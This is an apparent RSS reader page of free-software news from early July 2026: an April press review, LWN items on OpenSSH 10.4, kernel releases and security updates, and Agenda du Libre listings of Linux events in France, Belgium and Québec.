Vue normale

Reçu — 6 juillet 2026 Actualités libres

Revue de presse de l’April pour la semaine 27 de l’année 2026

Par : echarp
6 juillet 2026 à 19:30

Cette revue de presse sur Internet fait partie du travail de veille mené par l’April dans le cadre de son action de défense et de promotion du logiciel libre. Les positions exposées dans les articles sont celles de leurs auteurs et ne rejoignent pas forcément celles de l’April.

[Les Numeriques] “J'ai voulu créer une app gratuite, open source et respectueuse de la vie privée”: Saracroche, le logiciel qui veut mettre fin aux démarchages téléphoniquess

✍ Corentin Bechade, le jeudi 2 juillet 2026.

Né il y a un peu plus d’un an, Saracroche est rapidement devenu un phénomène en France. Pensée pour échapper au fléau des appels indésirables, l’app s’est taillé une excellente réputation au fil des mises à jour. Nous nous sommes entretenus avec Camille Bouvat, son développeur principal, pour savoir comment cette petite solution toulousaine a réussi à s’imposer comme une référence sur le marché.

[The Conversation] Abondance, rareté, open source: et si le débat sur l'IA se trompait d'étage?

✍ Bruno Deffains, le jeudi 2 juillet 2026.

Et si les performances affichées de l’IA générative cachaient un autre enjeu, celui du discernement. Et sur ce terrain, l’Europe possède des atouts certains.

[Goodtech] Conformité au CRA: l'écosystème open source se dote d'une formation gratuite

Le jeudi 2 juillet 2026.

À l’approche de l’échéance de septembre 2026 du Cyber Resilience Act, l’Eclipse Foundation lance l’ORC Learning Hub pour guider les développeurs.

[Le Monde Informatique] Comment l'Éducation nationale a construit le cloud Nuage pour le partage de fichiers

✍ Matthew Finnegan, le mercredi 1 juillet 2026.

Basée sur des briques open source comme Nextcloud, la plateforme Nuage donne aux agents du ministère la possibilité de stocker et partager leurs documents tout en conservant les données sur des infrastructures publiques.

[Numerama] Godot interdit le code généré par IA dans son moteur open source

✍ Amine Baba Aissa, le mercredi 1 juillet 2026.

Débordée par l’afflux de pull requests de faible qualité, la Fondation Godot, à l’origine du moteur de jeu vidéo open source et gratuit utilisé pour créer des jeux 2D et 3D, a décidé de durcir sa politique de contribution, allant jusqu’à bannir le code généré par des agents IA.

[ZDNET] Libre et open source express: Europe numérique, le pape et le Libre, communautés toxiques, Wikipédia

✍ Thierry Noisette, le mardi 30 juin 2026.

Revue de web: Pierre Baudracco (BlueMind) et Jean-Baptiste Kempf (VLC) parlent de l’Europe. Une référence aux logiciels libres dans l’encyclique de Léon XIV? Sexisme bien présent. Un cofondateur banni de Wikipédia.

[Silicon.fr] Comment l'UE se représente l'open source en France

✍ Clément Bohic, le lundi 29 juin 2026.

La Commission européenne a mis à jour son rapport sur l’état de l’open source en France. Voici quelques éléments ajoutés pour la période 2023-2026.

[ZDNET] La souveraineté numérique à l'ONU: au cœur de la dynamique mondiale pour remplacer les géants américains par des technologies open source

✍ Steven Vaughan-Nichols, le lundi 29 juin 2026.

La souveraineté numérique s’est imposée comme le thème central de la Semaine de l’open source des Nations unies de cette année, de nombreux participants estimant que l’open source constitue désormais une infrastructure essentielle et qu’on ne peut pas faire confiance aux entreprises américaines.

Et aussi:

[ZDNET] 'La mutualisation, ça marche à fond!' L'Adullact, le logiciel libre au service des collectivités

✍ Thierry Noisette, le dimanche 28 juin 2026.

L’association libriste des collectivités territoriales, née en 2002, est forte d’un demi-millier d’adhérents. Premier de deux retours sur son 10e congrès, à Montpellier.

Commentaires : voir le flux Atom ouvrir dans le navigateur

OpenSSH 10.4 released

Par : jzb
6 juillet 2026 à 16:13

OpenSSH 10.4 has been released. In addition to a number of security and bug fixes, there are a few notable changes; this release adds experimental support for a composite post-quantum signature scheme combining ML-DSA 44 and Ed25519 as described in this IETF draft. With 10.4, if OpenSSH is compiled with sandbox support it will fail on Linux systems that have not enabled SECCOMP or NO_NEW_PRIVS; prior to this release, sshd would log an error but continue operation. See the release notes for a full list of changes.

[$] The kernel's iomap layer

Par : corbet
6 juillet 2026 à 14:37
Conversations about the kernel's filesystem implementations often involve a layer called "iomap", but relatively few people can reliably say what iomap actually is. That is just the kind of gap that LWN exists to fill. In short, iomap handles the mapping between data in the filesystem space (identified by a file of interest, and an offset within that file) and in the storage space (which may be a memory location, or a set of blocks on a storage device). Using that mapping, iomap handles a long list of common, filesystem-related tasks, allowing a lot of boilerplate code to be removed from individual filesystem implementations.

Security updates for Monday

Par : jzb
6 juillet 2026 à 13:13
Security updates have been issued by AlmaLinux (container-tools:rhel8, grafana, grafana-pcp, kernel, ruby:2.5, and ruby:3.3), Debian (bird3, chromium, kernel, linux-6.1, mediawiki, nginx, openvpn, php-phpseclib, php8.2, php8.4, and sympa), Fedora (7zip, buildah, chromium, clamav, freerdp, leptonica, mariadb10.11, mariadb11.8, nextcloud, nsd, openqa, openvpn, os-autoinst, pdns, pdns-recursor, perl-Crypt-ScryptKDF, podman, python-jupyter-server, and python-streamlink), Mageia (mariadb and yt-dlp), Slackware (libevent, libseccomp, mozilla, mutt, and php82), SUSE (apache2, containerd, dnsmasq, docker, dracut, firewalld-legacy, gimp, glibc, golang-github-docker-libnetwork, google-guest-agent, gstreamer-plugins-bad, helm, kernel, kernel-devel, keybase-client, kitty, krb5, libarchive, libnfs, libslirp, nilfs-utils, openCryptoki, openQA, openssl-3, pacemaker, pcr-oracle, perl-DBI, perl-List-SomeUtils-XS, podman, python-pip, python-pydata-sphinx-theme, python-tornado6, python3-lxml, python311-mistune, python313-joserfc, rmt-server, sg3_utils, systemd, tracker-miners, and xdg-dbus-proxy), and Ubuntu (cifs-utils, linux-nvidia, linux-nvidia-6.17, linux-raspi-realtime, and ncurses).

? Les journaux LinuxFr.org les mieux notés de juin 2026

6 juillet 2026 à 09:10

LinuxFr.org propose des dépêches et articles, soumis par tout un chacun, puis revus et corrigés par l’équipe de modération avant publication. C’est la partie la plus visible de LinuxFr.org, ce sont les dépêches qui sont le plus lues et suivies, sur le site, via Atom/RSS, ou bien via partage par messagerie instantanée, par courriel, ou encore via médias sociaux.

Bannière LinuxFr.org

Ce que l’on sait moins, c’est que LinuxFr.org vous propose également de publier directement vos propres articles, sans validation a priori de lʼéquipe de modération. Ceux-ci s’appellent des journaux. Voici un florilège d’une dizaine de ces journaux parmi les mieux notés par les utilisateurs et les utilisatrices… qui notent. Lumière sur ceux du mois de juin passé.

Commentaires : voir le flux Atom ouvrir dans le navigateur

Kernel prepatch 7.2-rc2

Par : corbet
6 juillet 2026 à 01:53
The 7.2-rc2 kernel prepatch is out for testing. Linus said: "It's Sunday afternoon, and rc2 is out. Things look very normal - it's not a small rc2, but it's in line with recent releases, and slightly smaller than rc2 was in 7.1. Let's see how that all continues, but so far so good."
Reçu — 5 juillet 2026 Actualités libres

Mondial de l’Auto 2026 : les voitures électriques attendues sur les stands, marque par marque

3 septembre 2026 à 13:21

Quelles seront les voitures électriques à découvrir au Mondial de l'Auto de Paris 2026 ? Cette édition devrait être l'endroit choisi par de nombreuses marques pour exposer leurs nouveautés. Voici les modèles attendus.

Agenda du Libre pour la semaine 28 de l'année 2026

5 juillet 2026 à 09:50

Calendrier Web, regroupant des événements liés au Libre (logiciel, salon, atelier, install party, conférence), annoncés par leurs organisateurs. Voici un récapitulatif de la semaine à venir. Le détail de chacun de ces 30 événements (France: 25, Belgique: 2, Internet: 2, Québec: 1) est en seconde partie de dépêche.

Sommaire

[FR Saint Clar] Tous les Lundis, médiatheque de Saint Clar – Le lundi 6 juillet 2026 de 10h00 à 17h00.

Tous les lundis de 10h à 17h sans interruption, l’association Prends-toi en main / atelier abcpc, propose install party, suivi, dépannage, formation et revalorisation à petit prix sous Linux exclusivement.

L’atelier abcpc existe depuis plus de 10 ans et milite exclusivement pour les logiciels libres.

[FR Saint-Étienne] Permanence de l’association Alolise – Le lundi 6 juillet 2026 de 19h00 à 22h00.

Tous les lundis soir de 19h à 22h (hors jours fériés) à la Bricoleuse.

Rencontrer les bénévoles, poser des questions sur le libre ou l’informatique, les logiciels, l’hébergement, passer de Windows à Linux.

Pour passer votre ordinateur sous Linux, nous vous invitons à nous prévenir avant votre passage: contact@alolise.org.

[FR Sainte-Hélène] Cours gratuits d’Espéranto + Visio – Le lundi 6 juillet 2026 de 19h30 à 21h30.

Saluton,

Je vous propose des cours d’espéranto gratuits qui débuteront le lundi 8 juin à Sainte-Hélène dans le Médoc et qui sera également disponible en visioconférence.
Le cours est destiné aux apprenants francophones de France et d’ailleurs.

L’espéranto est plus qu’une langue neutre et très facile, mais aussi une langue fraternelle et libre qui permet de voyager dans de nombreux pays avec des facilités d’hébergement ou de fraterniser avec des personnes du monde entier.
Vous trouverez plus d’informations sur la page Wikipédia, le site Espéranto-Gironde ou en visualisant le documentaire "ESPÉRANTO: de la genèse à la conquête de l’Europe"

Les cours ont lieu le lundi soir de 19h30 à 21h30 sur environ 10 soirs pour réaliser les 10 leçons. Ces leçons complèteront les cours papier ou d’application telle que Duolingo.
Début: lundi 8 juin 2026.
Les cours sont GRATUITS pour tous.

Le cours est en présentiel à Sainte-Hélène (33480) au foyer des sociétés en collaboration avec l’association l’Écurieux, ainsi qu’en distanciel / visioconférence.
Ce cours est gratuit pour tous, en présentiel ou en distanciel.

Nous pourrons organiser à la suite du cours, des rencontres avec les espérantistes de Bordeaux, du pays basque… afin de pratiquer en situation réelle.

N’hésitez pas à nous contacter par téléphone au 0688350981 (appel, SMS, Signal) pour plus d’informations ou pour vous inscrire.

Vivu Esperanto kaj Ĝis la revido.

[FR Saint-Herblain] Repair Café numérique + Install Party – Le mardi 7 juillet 2026 de 14h00 à 17h00.

Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.

Marre de Windows et envie d’un peu de liberté, venez le libérer!

[FR Dijon] Atelier du mardi – Le mardi 7 juillet 2026 de 15h00 à 19h00.

Présentation de différents outils concernant les logiciels libres.

Assistance technique.

De préférence sur RDV directement sur le site de l’asso

[CA-QC Montréal] Rencontres Linux au Québec – Le mardi 7 juillet 2026 de 17h00 à 21h30.

Local de la rencontre: École de Technologie Supérieure local B-0904
Rencontre virtuelle: Suivez le lien sur la page de l’événement

17:00 à 19:00 – 5 à 7 virtuel et en présentiel

Rejoignez-nous pour un moment de détente et de convivialité lors de notre 5 à 7. Que vous préfériez nous retrouver au Resto-Pub 100 Génies de l’ÉTS ou en ligne sur BigBlueButton (BBB), l’essentiel est de partager un moment agréable. Si vous avez l’intention de venir en personne, veuillez nous en informer afin de pouvoir réserver suffisamment de place pour vous.

18:30 à 19:00 – Installation et tests de l’environnement hybride (tests de son et vidéo)

Nous assurerons que l’environnement hybride soit parfaitement opérationnel en effectuant des tests de son et de vidéo.

19:00 à 21:30 – Programmation de la rencontre

  1. Accueil et mot de bienvenue Martial Bigras
  2. Capsule éducative: L’objection-sociocratique comme core de gouvernance léger pour les petites communautés open source. Par Jérémy Viau-Trudel

Jérémy viendra vulgariser et partager le résultat de 27 ans en recherche-action sur les communautés de pratiques ouvertes, de développement libre et open source.

Pas de blabla inutile: un format court, dense et accessible pour comprendre les clés d’une gouvernance collaborative efficace.

Une courte présentation inspirante à ne pas manquer pour tous les passionnés de l’écosystème libre. 🐧

A propos de Jérémy Viau-Trudel

Ayant une trajectoire atypique, Jérémy Viau-Trudelvient de la chimie quantique. Pendant ses études supérieures à l’Université Laval, puis à l’Université Paris-Sud, il a mené des recherches de haut niveau sur la simulation de la dynamique électronique de molécules soumises à des champs laser intenses. C’est là, d’abord par nécessité, qu’il a commencé à utiliser Linux. Depuis une dizaine d’années, il est consultant TI spécialisé en Linux et intervient régulièrement sur des mandats DevSecOps. Son approche pragmatique l’a amené à travailler aussi bien sur des infrastructures on-premise qu’en infonuagique et en edge computing.

  1. Présentations

Présentation 1: La portée de la souveraineté: How far can we go ? par Alex Blackie

[Présentation en anglais]

La souveraineté numérique ne se résume pas à héberger ses serveurs localement. Derrière chaque application se cache une chaîne complète de dépendances: code source, plateformes de développement, infrastructures infonuagiques, matériel, réseaux et fournisseurs de services.

Lors de cette présentation, Alex Blackie proposera une réflexion sur les limites et les possibilités d’une véritable souveraineté technologique. Est-il réaliste de construire une chaîne d’approvisionnement entièrement nationale, du développement logiciel jusqu’à l’infrastructure physique ? Quels compromis faut-il accepter, et quels bénéfices peut-on en retirer ?

Cette présentation s’adresse aux développeurs, administrateurs systèmes, professionnels des infrastructures ainsi qu’à toute personne intéressée par les enjeux de souveraineté numérique, de logiciel libre et d’infonuagique.

À propos du présentateur
Alex Blackieest développeur logiciel, administrateur systèmes et réseaux, ainsi qu’entrepreneur. Fort de plus de quinze années d’expérience dans l’industrie des technologies de l’information, il s’intéresse depuis longtemps aux enjeux de souveraineté numérique et aux infrastructures ouvertes.

Il est le fondateur de BlackieOps, l’entreprise derrière Worktree, une plateforme canadienne de développement collaboratif et une alternative à GitHub, accompagnée d’une offre infonuagique axée sur les besoins des organisations canadiennes. À travers ses projets, Alex œuvre à bâtir des solutions technologiques ouvertes qui redonnent aux organisations un meilleur contrôle sur leurs données et leurs infrastructures.

Présentation 2 – ACRA: une suite logicielle libre d’observabilité pour la sécurité de nos infrastructures sur site et infonuagiques par Kitio Fofack

Les infrastructures informatiques modernes sont de plus en plus complexes, réparties entre serveurs sur site, environnements virtualisés, conteneurs et services infonuagiques. Dans ce contexte, disposer d’une visibilité complète sur l’état de ses systèmes est devenu essentiel pour assurer leur performance, leur fiabilité et leur sécurité.

Lors de cette présentation, Kitio Fofack nous fera découvrir ACRA, une suite logicielle libre d’observabilité conçue pour surveiller et protéger les infrastructures informatiques. Nous explorerons comment la collecte et l’analyse des métriques, journaux et événements permettent de détecter rapidement les anomalies, d’améliorer la résilience des systèmes et de renforcer la posture de sécurité des organisations.

Cette présentation s’adresse aux administrateurs systèmes, professionnels DevOps, spécialistes de la cybersécurité ainsi qu’à toute personne intéressée par les solutions libres de surveillance et d’observabilité. Des exemples concrets permettront d’illustrer comment ACRA peut être déployé aussi bien dans des environnements sur site que dans des infrastructures infonuagiques.

À propos du présentateur:

Fondateur/Représentant de l’IREX et Conférencier international

Pionnier et évangéliste des communs numériques, j’œuvre pour la réappropriation des technologies à des fins sociétales. À travers l’Institut du Retour d’Expérience (IREX), je développe des infrastructures libres conçues comme les fondations d’un modèle économique plus équitable. De la souveraineté alimentaire en agriculture biologique à la pérennité de notre système de santé, en passant par la création d’emplois locaux non délocalisables, je démontre que le logiciel libre est une réponse directe aux crises contemporaines. Reconnu pour cet engagement, j’ai été invité à présenter cette interconnexion entre technologies ouvertes et objectifs de développement durable lors des prestigieux UN Open Source Days 2025.

Présentation 3 – Sécurisation des variables d’environnement et souveraineté: l’approche KeyHarbour par Denis Fabien et Étienne Morency

La sécurité d’une application ne dépend pas uniquement de la qualité de son code. Les variables d’environnement, clés d’API, mots de passe et autres secrets utilisés en production représentent souvent une surface d’attaque sous-estimée. Comment protéger efficacement ces informations sensibles tout en facilitant le travail des équipes de développement et d’exploitation ?

Lors de cette présentation, Denis Fabien et Étienne Morency nous feront découvrir KeyHarbour, une solution souveraine basée sur des standards ouverts permettant d’éliminer le stockage statique des secrets dans les fichiers de configuration. Nous verrons comment l’injection dynamique de secrets peut améliorer la sécurité, réduire les risques d’exposition et renforcer la traçabilité des accès aux informations sensibles.

Cette présentation s’adresse particulièrement aux administrateurs systèmes, spécialistes DevOps, responsables de la sécurité et équipes d’infrastructure qui souhaitent offrir aux développeurs un environnement à la fois plus sécuritaire, plus simple à gérer et mieux adapté aux exigences des infrastructures modernes.

À propos des présentateurs: Denis Fabien est consultant et coach DevOps auprès de grandes entreprises. Depuis le début de sa carrière, il a évolué entre le développement logiciel et l’administration de systèmes (notamment Linux).Cette double expertise l’a naturellement conduit vers le DevOps, et plus particulièrement vers l’automatisation des déploiements et la gestion des infrastructures. Il est également responsable des partenariats chez KeyHarbour.

Étienne Morency est architecte de solutions et passionné par les technologies ouvertes et l’optimisation des environnements TI. Il accompagne les organisations dans la conception et la mise en place de solutions robustes, pragmatiques et durables. Son expérience couvre l’architecture, l’automatisation, l’intégration et l’accompagnement des équipes techniques. Il agit également comme directeur technique de KeyHarbour, où il contribue à orienter les choix technologiques et l’évolution des solutions.

  1. Réseautage avec les autres Linuxien(ne)s

Une période d’échange de trucs et astuces sous Linux, où chacun est encouragé à partager ses connaissances.

Extras

Que vous soyez débutant ou expert, étudiant ou professionnel, cette réunion est ouverte à tous. Elle réunit une diversité de personnes, allant des gestionnaires aux programmeurs, des professeurs aux retraités, unissant ainsi des esprits passionnés par les logiciels libres, quel que soit votre domaine d’expertise.

Rejoignez-nous pour cette opportunité exceptionnelle de socialiser, d’apprendre, et de tisser des liens avec d’autres passionnés. Ensemble, nous pouvons approfondir notre compréhension des logiciels libres et contribuer à une communauté dynamique.

La participation est gratuite, et nous avons hâte de vous rencontrer, que ce soit en personne ou en ligne. Inscrivez-vous dès maintenant pour recevoir le lien de la réunion virtuelle, et pensez à nous informer si vous prévoyez de vous joindre à nous au Resto-Pub 100 Génies de l’ÉTS.

Au plaisir de partager cette soirée exceptionnelle avec vous!

Cordialement,

Comité organisateur des Rencontres Linux au Québec P.S.: Pour le transport en commun : Station de métro Bonaventure

[FR Lyon] Polar en Vacances, 11ᵉ édition – Du mercredi 8 juillet 2026 à 13h00 au jeudi 9 juillet 2026 à 09h00.

C’EST QUOI ?

Commencez votre été avec le festival Polar en Vacances !

Traditionnel rendez-vous jeunesse donné par Quais du Polar au mois de juillet, Polar en Vacances revient pour sa 11ᵉ édition les mercredi 8 et jeudi 9 juillet 2026 afin de promouvoir la lecture et l’écriture auprès des plus jeunes !

Au programme : des ateliers d’écriture, d’illustration et de découpage, un espace dédié à la lecture, un espace jeux de société, un escape game et un espace librairie jeunesse qui accueillera les dédicaces de nos autrices et illustratrices invitées. Cette année, la thématique sera centrée autour des « Petits et grands héros »

Les ateliers sont GRATUITS et sur inscription obligatoire pour les groupes et recommandée pour les familles.

[FR Fourmies] La permanence du libre – Le mercredi 8 juillet 2026 de 13h30 à 17h00.

Dans le cadre de la stratégie Rev3 de la ville de Fourmies est né le Central, Carrefour de la Résilience.

À ce titre, l’Association Club Linux Nord Pas-de-Calais Fourmies vous accompagne et vous guide dans la configuration, la personnalisation et la prise en main de vos logiciels (Libres).

C’est un espace de rencontres et d’échanges, uniquement basés sur les logiciels libres et le concept de l’open source.

De 13h30 à 17h00 tous les mercredi, venez prendre en main vos logiciels libres et vos installations Linux Mint ou Mageia.

La permanence du libre est un complément des install parties du samedi.

Cette manifestation a lieu au Tiers-Lieu Le Central à Fourmies.

[FR Nantes] Repair Café numérique + Install Party – Le mercredi 8 juillet 2026 de 14h00 à 18h00.

Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.

Marre de Windows et envie d’un peu de liberté, venez le libérer!

[FR Gond-Pontouvre] Permanence du mercredi – Le mercredi 8 juillet 2026 de 14h00 à 18h00.

Nous sommes convaincus depuis le début qu’un ordinateur n’est pas un consommable jetable et qu’on a tous le droit de comprendre et de maîtriser nos outils numériques. C’est de là qu’est née l’asso, à Gond-Pontouvre: un repaire de passionnés du libre et du bidouillage, où l’on défend les logiciels libres, la souveraineté technologique et le bon vieux plaisir de mettre les mains dans le cambouis. Au fil du temps, on a élargi le terrain de jeu, mais l’esprit reste le même: on apprend, on partage, on transmet.

Le cœur historique, c’est le reconditionnement. On collecte des machines en fin de vie, on les teste sous toutes les coutures, et on leur offre une seconde jeunesse: passage en SSD pour réveiller les plus poussives, installation de Linux Mint pour un système libre, léger et accessible, et hop – un PC qu’on croyait bon pour la benne repart pour plusieurs années.

Vous avez un vieux portable qui rame ou une tour oubliée au grenier? Apportez-la, on regarde ensemble.

Côté fabrication numérique, le FabLab ouvre ses portes: venez concevoir et fabriquer vos projets sur nos machines – impression 3D (Creality K1 Max & K2 Plus), découpe et gravure laser (Falcon 2 Pro 60W), et de quoi toucher à
l’électronique embarquée. Les bénévoles sont là pour vous guider – l’idée n’est pas de faire à votre place, mais de vous apprendre à faire.

Entrée libre, esprit d’entraide et de partage des savoirs. Apportez vos questions, vos machines ou simplement votre curiosité.

[FR Muzillac] Formation : Maîtriser un gestionnaire de mots de passe – Le mercredi 8 juillet 2026 de 16h00 à 18h00.

Aujourd’hui, le risque de voir pirater ses différents comptes en ligne est très élevé. Afin de s’en protéger, nous devons avoir des mots de passe complexes, différents pour chaque service et pouvoir les modifier régulièrement. Cela devient un véritable casse-tête.

L’association Ourse a pour objet d’animer et administrer notre monnaie locale. Ce faisant, nous avons d’autant plus besoin de nous mettre à l’abri des risques de vols de données. C’est pourquoi nous avons dû notamment apprendre la maîtrise du gestionnaire de mots de passe libre KeepassXC.

Cette formation vise à diffuser auprès des bénévoles l’utilisation de ce logiciel et la mise en place de pratiques sécurisées et est ouverte à tous.

Sur inscription sur ce formulaire ; places limitées et des téléchargements sont recommandés en amont. Apporter son ordinateur portable et smartphone. L’objectif est d’en ressortir avec les compétences et tout le système nécessaire installé et fonctionnel sur vos appareils.

D’autres séances pourront être proposées ultérieurement.

[FR Marseille] Réunion d’information. Installation Linux – Le mercredi 8 juillet 2026 de 18h00 à 19h00.

💻🌱 Ton ordi rame avec Windows? T’as entendu parler de Linux sans oser te lancer?

Viens à une Install Party chez Emmaüs Connect à Marseille!
On t’informe et on t’aide à installer Linux Mint sur ton ordi, gratuitement, dans la bonne humeur et entouré·e de bénévoles super cool 😎
Tu repars avec un PC rafraîchi… et zéro centime dépensé 💸

🎯 C’est pour toi si:

  • Tu veux prolonger la vie de ton ordi sans passer par Windows 11
  • Tu veux apprendre à mieux maîtriser ton outil numérique
  • Tu veux faire un geste pour la planète ♻️
  • Tu veux découvrir un super lieu de solidarité numérique à Marseille!

📍 Où ? 11 cours Franklin Roosevelt, Marseille 1er
📆 Quand? Réunion d’information le 08/07 à 18h, Install'Party le 18/07 à 9h30.

Inscription uniquement par mail à marseille@emmaus-connect.org

Rejoins-nous pour une expérience libre, écolo et solidaire!

[FR Lyon] Réunion mensuelle – Le mercredi 8 juillet 2026 de 19h00 à 22h00.

Réunion ouverte à tous, adhérent ou pas.

Les réunions mensuelles Hadoly ont lieu tous les 2ᵉ mercredi du mois, à partir de 19h.

Soit en présentiel dans les locaux de la maison de l’écologie – 4 rue Bodin 69001 Lyon

Soit en distanciel sur l’adresse https://jitsi.hadoly.fr/permanence-hadoly.

À propos de cet événement

La permanence (mensuelle) d’Hadoly (Hébergeur Associatif Décentralisé et Ouvert à LYon), chaton lyonnais, est l’occasion d’échanger avec les membres de l’asso sur les services et moyens mis à disposition des adhérents afin de se libérer des Gafams tout en partageant ce que chacun·e aura amené pour grignoter ou boire.

Nous partageons du mail, du cloud, et d’autres services, le tout basé exclusivement sur une infrastructure locale et des logiciels libres. Nous respectons la neutralité du net et la vie privée. Plus largement nous échangeons autour des communs numériques, des cultures libres et de l’éducation populaire par exemple en réalisant ou animant des ateliers d’éducation aux médias.

Vous serez bienvenu pour présenter votre projet, celui de votre organisation, causer communs numériques, cultures libres et éduc pop.

[FR Bordeaux] Cours gratuits d’Espéranto – Le mercredi 8 juillet 2026 de 20h00 à 22h00.

Saluton,

Nous proposons une nouvelle session de cours d’Espéranto qui débuteront début juin au café Le Petit Grain, Place Dormoy à Bordeaux (c’est un café associatif avec des tarifs abordables dans le quartier de la gare Saint-Jean à côté de Barbey).

L’espéranto est plus qu’une langue neutre et facile, mais aussi une langue fraternelle et libre qui permet de voyager dans le monde entier avec des facilités d’hébergement ou de fraterniser avec des personnes dans d’autres pays.

Cette vidéo vous permettra d’en savoir plus: https://peertube.dc.pini.fr/w/akMZAKM9zJWG5mXLBtuQN4
Vous trouverez également plus d’informations sur: https://esperanto-gironde.fr/lesperanto/, il y a l’abonnement à la lettre d’informations mensuelle qui est proposée en fin de chaque page afin de rester informé des activités espérantistes du coin.

Les cours ont lieu le mercredi soir de 20h00 à 22h00, 10 soirs pour réaliser les 10 leçons. Ces leçons complètent le cours de l’application Duolingo.
Début: mercredi 3 juin 2026.

Les cours sont GRATUITS pour les membres du café associatif.
Cependant, vous devrez adhérer au café associatif Le Petit Grain qui nous prête chaleureusement ses locaux si vous n’êtes pas membre. L’adhésion annuelle pour toute l’année 2026 est à prix libre conseillé à 5€, minimum 2€ et permet aussi la participation aux autres ateliers et activités.

N’hésitez pas à nous contacter par téléphone au 0688350981 (appel, SMS, Signal) ou en répondant à ce message pour plus d’informations ou pour vous inscrire.
Vous pouvez aussi nous rencontrer chaque 3ᵉ mercredi du mois de 18h00 à 19h30 au café Le Petit Grain ainsi que lors du défilé du 1ᵉʳ mai autour de notre banderole.

Ĝis la revido.

[Internet] Mini-webinaire Scenari : L’après-Canoprof : des solutions pour utiliser ses contenus au-delà du 31 juillet 2026 – Le jeudi 9 juillet 2026 de 15h30 à 16h30.

Mini-webinaire plutôt orienté enseignement primaire/secondaire.

Suite à l’arrêt annoncé par Réseau Canopé de la plateforme CanoprofCloud pour le 31 juillet 2026, nous te présenterons un nouveau service en ligne proposé par Kelis ainsi que d’autres solutions pour aider à récupérer et continuer à utiliser les contenus Canoprof. Nous en profiterons pour refaire un point sur le contexte et le vocabulaire autour du système Scenari.

Toutes les informations sur https://info.prof.scenari.cloud/

[BE Lessines] Atelier les co-libristes – Le jeudi 9 juillet 2026 de 18h00 à 21h30.

Atelier sur les logiciels libres.

Installation et configuration.

Hygiène numérique.

[FR Romans-Sur-Isere] Install Party Linux – Le jeudi 9 juillet 2026 de 18h00 à 22h00.

Nous organisons la 1e Install Party a Romans-Sur-Isere au cafe associatif le PasSage

Venez decouvrir le logiciel libre, discuter autour d’un verre, installer votre pc avec un systeme libre.

[BE Huy] Réunion mensuelle LiHuy – Le jeudi 9 juillet 2026 de 19h30 à 22h30.

L’occasion idéale pour se retrouver, échanger autour du logiciel libre, vous accompagner dans le remplacement de Windows par Linux sur vos machines (sans dual-boot), ou encore découvrir ensemble de nouvelles distributions et applications.

[FR Quimperlé] Point info GNU/Linux – Le vendredi 10 juillet 2026 de 13h30 à 17h30.

Médiathèque de Quimperlé, place Saint Michel, pas d’inscription, entrée libre !

Mickaël, Johann, Alain, et Yves vous accueillent (ou l’un d’eux, on se relaie !).

Conseils, aide et infos pratiques GNU/Linux et Logiciels Libres.

Curieux ? Déjà utilisateur ? Expert ? Pour résoudre vos problèmes, vous êtes le bienvenu ; pas besoin de prendre rendez-vous !

N’hésitez pas à venir avec votre PC si vous voulez une installation de GNU/Linux ou de venir avec votre périphérique récalcitrant (imprimante, scanner…) si possible.

[FR Nantes] Repair Café numérique + Install Party – Le vendredi 10 juillet 2026 de 14h00 à 17h00.

Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.

Marre de Windows et envie d’un peu de liberté, venez le libérer!

[FR Brest] Atelier d’été – LAN Jeux Vidéo Libres – Le vendredi 10 juillet 2026 de 14h00 à 17h00.

La plus grande LAN partie sous linux de Brest cet été 💥

Venez avec ou sans votre ordinateur, sous Linux ou BSD 🐧

Que vous vouliez vous exploser sur Xonotic ou Teeworlds, reconstruire les 4 moulins dans Luanti, ou être le meilleur stratège du siècle dans 0ad, vous passerez forcément un bon moment 🎊

Entrée libre pour tout le monde.

--

Le local est accessible aux personnes à mobilité réduite

Il y a des arceaux à vélo à proximité

L’arrêt de bus le plus proche est: Cosmao Prétot, ligne 2B

L’arrêt de tramway le plus proche est: Polygone

[FR Le Tholonet (Palette)] Réunion mensuelle de l’Axul – Le vendredi 10 juillet 2026 de 20h00 à 23h00.

Les membres de l'Axul (Association du Pays d’Aix des Utilisateurs de Linux et des Logiciels Libres) vous invitent à leur réunion réelle du vendredi 10 juillet de 20h00 à 23h00 au Centre Culturel Georges Duby du Tholonet, 744 avenue Paul Julien, à proximité de la place du marché de Palette (premier village sur la D7n au Sud-Est d’Aix).

  • 20h00 – 20h15: Accueil
  • 20h15 – 20h30: Présentation des participants et organisation de la soirée
  • 20h30 – 23h00:
  • Interventions urgentes si nécessaires
  • Discussions et décisions importantes
  • Interventions extérieures (Forum des Associations & du bénévolat
  • Précisions sur le don probable d’ordinateurs (suite)
  • Annuaire des membres (suite)
  • Organisation des listes de diffusion

  • Autres questions ?

Évènements ultérieurs: voir l'Agenda du Libre

Ces réunions libres et gratuites sont ouvertes à toutes et à tous, débutantEs ou expertEs GNU/Linux, membres ou non de l'Axul.

Entrée Libre. Tout Public.

[Internet] Pause Café Linux : Votre rendez-vous hebdomadaire – Le vendredi 10 juillet 2026 de 11h45 à 13h00.

Pause Café Linux: Votre rendez-vous hebdomadaire

Est-ce que Linux vous passionne ? Vous voulez simplement jaser de logiciels libres dans une ambiance décontractée ? Rejoignez-nous pour la Pause Café Linux, un rendez-vous unique dans la francophonie Linuxienne ! C’est le moment idéal pour briser l’isolement, partager vos découvertes et rencontrer d’autres passionnés de l’écosystème Linux au Québec.

C’est quand ?

Tous les vendredis midis (12h00 HAE, Québec).

Apportez votre lunch, nous fournissons le café… virtuellement !

Au programme

  • Discussion libre: Pas d’ordre du jour rigide, on parle de ce qui vous anime.
  • Tour de table rapide: Afin de mieux se connaître.
  • Le Brise-Glace: Une question thématique différente pour lancer la conversation.
  • Entraide et partage: Un espace bienveillant pour tous les niveaux, du débutant à l’expert.

Comment participer ?

  • Échangez avec nous: Rejoignez notre canal de discussion sur Framateam pour vous présenter et rester informé. Rejoindre le canal Pause Café
  • Connectez-vous à la rencontre: Tous les vendredis midis, cliquez simplement sur le lien ci-dessous pour accéder à notre salon de visioconférence (BigBlueButton). Accéder au salon virtuel (BBB)

Venez avec votre lunch, votre café, et surtout votre curiosité !

La participation est gratuite, ouvert à tous!

Notre réunion accueille une diversité de profils: étudiants, professionnels, gestionnaires, programmeurs, professeurs, ou retraités. Que votre passion soit l’administration système, le développement, ou la simple utilisation quotidienne, votre expérience est précieuse. Ensemble, nous pouvons approfondir notre compréhension des logiciels libres et contribuer à une communauté dynamique.

